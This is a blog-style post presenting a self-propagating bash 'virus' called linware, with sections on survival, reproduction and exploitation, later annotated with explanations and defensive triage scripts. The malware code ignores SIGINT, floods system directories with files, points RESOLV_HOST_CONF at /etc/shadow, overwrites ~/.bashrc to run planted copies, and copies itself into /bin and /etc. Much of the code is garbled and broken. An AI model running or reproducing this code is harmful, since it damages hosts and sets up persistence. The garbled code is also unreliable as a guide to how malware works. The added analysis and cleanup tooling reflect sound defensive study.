Metamorphic Virology

Rudimentary Metamorphic Virology, by Gregory Disney-Leugers

Download at: https://docs.google.com/file/d/0B3OSDccoP1KhQkpPVURENmx4MlU/edit?usp=sharing

Virology should be viewed as evolutionary biology applied to code; to demonstrate this I wrote a bash script. The script is metamorphic in the sense of being self-modifying and self-propagating (though each copy differs from its parent only in the random file names baked into it, not in its logic), and it covers the three main attributes of metamorphic virology: methods of survival, reproduction, and exploitation.

Survival:

```bash
#!/bin/bash
trap '' INT
for do
```

The first line, `trap '' INT`, makes the shell ignore SIGINT, so once the script is running Ctrl+C cannot stop it. That is all it does: `kill <pid>` (SIGTERM) or `kill -9 <pid>` (SIGKILL) still ends the process, and SIGKILL can be neither trapped nor ignored. A loop like the one begun on the second and third lines would normally record its PID in a pidfile so that it can be stopped; this script writes none, to aid survival (the process still has a PID and is visible in `ps`). The loop as reproduced here is only a fragment: `for do` has no list and no matching `done`.
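
To see what `trap '' INT` actually protects against, here is an added shell example (mine, not the post's code): it starts a loop that ignores SIGINT the way the script does, then sends it SIGINT and SIGTERM in turn and reports whether the process survived each. It assumes bash and a `sleep` that accepts fractional seconds; the function names are my own.

```bash
#!/bin/bash
# Added example (not code from the post): what `trap '' INT` does and does not
# buy the process. A child loop is started with SIGINT ignored, exactly as the
# post's script does, then it is sent SIGINT and SIGTERM in turn.

# Start a looping child that ignores SIGINT and record its PID in LOOP_PID.
# (bash also ignores SIGINT in background children of a non-interactive shell,
# so the trap is redundant here; it is kept to mirror the post's script.)
start_int_ignoring_loop() {
    bash -c 'trap "" INT; while :; do sleep 0.1; done' >/dev/null 2>&1 &
    LOOP_PID=$!
}

# Send SIGNAL to PID, give it a moment, and print "alive" or "dead".
signal_and_check() {
    local pid="$1" signal="$2"
    kill -s "$signal" "$pid" 2>/dev/null || true
    sleep 0.5
    if kill -0 "$pid" 2>/dev/null; then
        echo alive
    else
        echo dead
    fi
}

# Prints "alive dead": the process shrugs off SIGINT but SIGTERM ends it.
# (SIGKILL, `kill -9`, cannot be ignored or trapped at all.)
demo_trap_int() {
    local after_int after_term
    start_int_ignoring_loop
    after_int=$(signal_and_check "$LOOP_PID" INT)
    after_term=$(signal_and_check "$LOOP_PID" TERM)
    kill -s KILL "$LOOP_PID" 2>/dev/null || true   # belt and braces
    wait "$LOOP_PID" 2>/dev/null || true
    echo "$after_int $after_term"
}

demo_trap_int
```

The practical consequence for anyone cleaning up after this script is that `pkill -TERM -f <scriptname>` (or `-KILL`) works exactly as it would for any other process; the trap only defeats the keyboard interrupt.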

Reproduction:

```bash
#!/bin/bash
export RESOLV_HOST_CONF=/etc/shadow
trap '' INT
for do
FILE="/tmp/$(basename $0).$RANDOM."
echo $FILE > $FILE
FILES="/var/$(basename $0).$RANDOM."
echo $FILES > $FILES
FILEZ="/etc/$(basename $0).$RANDOM."
echo $FILEZ > $FILEZ
FILE="/tmp/$(basename $0).$RANDOM."
echo $FILE > $FILE
FILES="/var/$(basename $0).$RANDOM."
echo $FILES > $FILES
FILEZ="/etc/$(basename $0).$RANDOM."
echo $FILEZ > $FILEZ
FILER="/run/$(basename $0).$RANDOM."
echo $FILER > $FILER
FILEQ="/root/$(basename $0).$RANDOM."
echo $FILEQ > $FILEQ
```

The loop now drops files in /tmp, /var, /etc, /run and /root, eight `echo`s per pass (the author estimates roughly seven files per second). Each name is the script's own name (`basename $0`) followed by a random number and a trailing dot, and each file contains nothing but its own path.

```bash
cd /root && chmod u+x /root/$(basename $0).$RANDOM. && cat >~/$(basename $0).$RANDOM. < $FILE
FILES="/var/$(basename $0).$RANDOM."
echo $FILES > $FILES
FILEZ="/etc/$(basename $0).$RANDOM."
echo $FILEZ > $FILEZ
FILE="/tmp/$(basename $0).$RANDOM."
echo $FILE > $FILE
FILES="/var/$(basename $0).$RANDOM."
echo $FILES > $FILES
FILEZ="/etc/$(basename $0).$RANDOM."
echo $FILEZ > $FILEZ
FILER="/run/$(basename $0).$RANDOM."
echo $FILER > $FILER
FILEQ="/root/$(basename $0).$RANDOM."
echo $FILEQ > $FILEQ
```

The intent of the `cat` is to write the reproduction loop into the generated files. Two things are worth noticing about that line as written: `$FILE` holds only the path string that the earlier `echo $FILE > $FILE` stored, not the script itself, and because every `$RANDOM` expands to a fresh value, the `chmod` target, the `cat` target and `$FILE` are three different names.

```bash
ssh lt 2>/tmp/$(basename $0).$RANDOM.
cat /tmp/$(basename $0).$RANDOM.|awk -F"\`" {'print  $RANDOM'}|awk -F"\'" {'print $RANDOM'}
while /bin/true ; do
  for i in $(basename $0)/* ; do
    if [ -w $i -a -c $i -a $i != $RANDOM ]; then
      cat $RANDOM > $i
    fi
  done
done
exec ~/$(basename $0).$RANDOM.
FSS
```

The `cat` now writes the ssh/awk payload above into the tmp files. Everything between the two `FSS` here-document markers is one output file (only the closing marker survives in the listing above; the opening `cat ... <<FSS` line is not reproduced).

```bash
#!/bin/bash
trap '' INT
for do
FILE="/tmp/linware.3861."
echo /tmp/linware.21415. > /tmp/linware.21415.
FILES="/var/linware.19561."
echo /var/linware.10574. > /var/linware.10574.
FILEZ="/etc/linware.1020."
echo /etc/linware.16689. > /etc/linware.16689.
FILE="/tmp/linware.21532."
echo /tmp/linware.21415. > /tmp/linware.21415.
FILES="/var/linware.8989."
echo /var/linware.10574. > /var/linware.10574.
FILEZ="/etc/linware.27934."
echo /etc/linware.16689. > /etc/linware.16689.
FILER="/run/linware.1029."
echo /run/linware.2459. > /run/linware.2459.
FILEQ="/root/linware.29530."
echo /root/linware.21523. > /root/linware.21523.
exec ~/linware.18402.
ssh lt 2>/tmp/linware.14894.
cat /tmp/linware.24609.|awk -F"`" {'print  12002'}|awk -F"\'" {'print 12646'}
while /bin/true ; do
  for i in linware/* ; do
    if [ -w  -a -c  -a  != 13866 ]; then
      cat 1915 >
    fi
  done
done
exec ~/linware.14617.
```

This is a sample of one generated script (the parent was named linware, so every copy is `linware.<number>.`). At its end it `exec`s another generated copy, so following the chain of `exec` targets from file to file maps how the malware propagates. Note that the numbers in the assignments and in the `echo` targets do not match, because each `$RANDOM` in the generator expanded separately.

Exploitation:

```bash
cat >~/.bashrc <<ASS
/opt/linware
/bin/linware
/etc/linware
/run/linware
ASS
cp /opt/linware /bin
cp /opt/linware /etc
exec /opt/linware
exec ~/$(basename $0).$RANDOM
```

Using `cat` once more, the script overwrites `~/.bashrc` (the `>` truncates it rather than appending) with the absolute paths of its planted copies, so every new interactive bash session runs them: that is how it infects bash to ensure survival. It then copies itself into /bin and /etc, `exec`s the /opt copy, and at the end of the loop `exec`s a fresh random-named copy to start all over again (that last line is reached only if `exec /opt/linware` fails, since a successful `exec` replaces the shell).
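
For the responder side of the two points above (mapping the propagation through the `exec` hand-offs, and the `.bashrc` persistence), here is an added example that is not the author's code: it finds files matching the `<name>.<random>.` pattern the script uses, follows the final `exec ~/...` in each copy, and lists the bare absolute-path lines planted in `.bashrc`. It runs only against a fixture constructed here under `mktemp`, reusing the numbers from the sample output; the helper names are my own.

```bash
#!/bin/bash
# Added example (not code from the post): responder-side triage for what the
# script leaves behind. The post says each copy is named
# "<scriptname>.<random>." (note the trailing dot) in /tmp, /var, /etc, /run
# and /root, that a copy ends with "exec ~/<next copy>", and that ~/.bashrc is
# overwritten with absolute paths to the planted copies. Everything here runs
# against a constructed fixture under mktemp, never against the real filesystem.

# List files under ROOT named NAME.<digits>. (the post's naming pattern).
find_dropped_files() {
    local root="$1" name="$2"
    find "$root" -type f -name "$name.*." 2>/dev/null \
        | grep -E "/$name"'\.[0-9]+\.$' | sort
}

# Print the "~/..." path a copy hands off to with its final exec, if any.
exec_target() {
    grep -oE 'exec ~/[^[:space:]]+' "$1" 2>/dev/null | tail -n 1 | awk '{print $2}'
}

# Print "copy -> next copy" for every dropped file that execs another one.
propagation_chain() {
    local root="$1" name="$2" f target
    find_dropped_files "$root" "$name" | while read -r f; do
        target=$(exec_target "$f")
        if [ -n "$target" ]; then
            echo "$f -> $target"
        fi
    done
}

# Print lines in RC that are a bare absolute path ending in /NAME.
bashrc_persistence() {
    local rc="$1" name="$2"
    grep -E "^/[^[:space:]]*/$name\$" "$rc" 2>/dev/null || true
}

# Single-value helper: how many dropped files are under ROOT.
count_dropped_files() {
    find_dropped_files "$1" "$2" | wc -l | tr -d ' '
}

# Build a constructed fixture mirroring the post's sample output (the numbers
# are the ones printed there) and print the sandbox path.
make_fixture() {
    local box
    box=$(mktemp -d)
    mkdir -p "$box/tmp" "$box/var" "$box/etc" "$box/run" "$box/root"
    # Plain drop files: each contains only its own path, as the script writes them.
    echo "/tmp/linware.21415." > "$box/tmp/linware.21415."
    echo "/var/linware.10574." > "$box/var/linware.10574."
    echo "/etc/linware.16689." > "$box/etc/linware.16689."
    echo "/run/linware.2459."  > "$box/run/linware.2459."
    # One copy that hands off to the next, as the sample output ends.
    printf '%s\n' '#!/bin/bash' "trap '' INT" 'exec ~/linware.14617.' \
        > "$box/root/linware.21523."
    # Decoys that must not match: no trailing dot, or not the script's name.
    echo "notes" > "$box/tmp/linware.txt"
    echo "notes" > "$box/tmp/other.123."
    # Overwritten .bashrc, as the exploitation step writes it.
    printf '%s\n' '/opt/linware' '/bin/linware' '/etc/linware' '/run/linware' \
        > "$box/root/.bashrc"
    echo "$box"
}

# Run the triage against the fixture and show what a responder would see.
demo_triage() {
    local box
    box=$(make_fixture)
    echo "dropped files: $(count_dropped_files "$box" linware)"
    propagation_chain "$box" linware
    echo "persistence lines in .bashrc:"
    bashrc_persistence "$box/root/.bashrc" linware
    rm -rf "$box"
}

demo_triage
```

On a real host the same functions would be pointed at `/` and the user's `.bashrc`; the trailing-dot file name is an unusual enough indicator that `find / -name '*.[0-9]*.'` alone surfaces the drops, and the `.bashrc` check catches the persistence even after the running processes have been killed.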


WARNING: this script should only be used in a controlled environment such as a VM.

WARNING: this script should be considered malicious.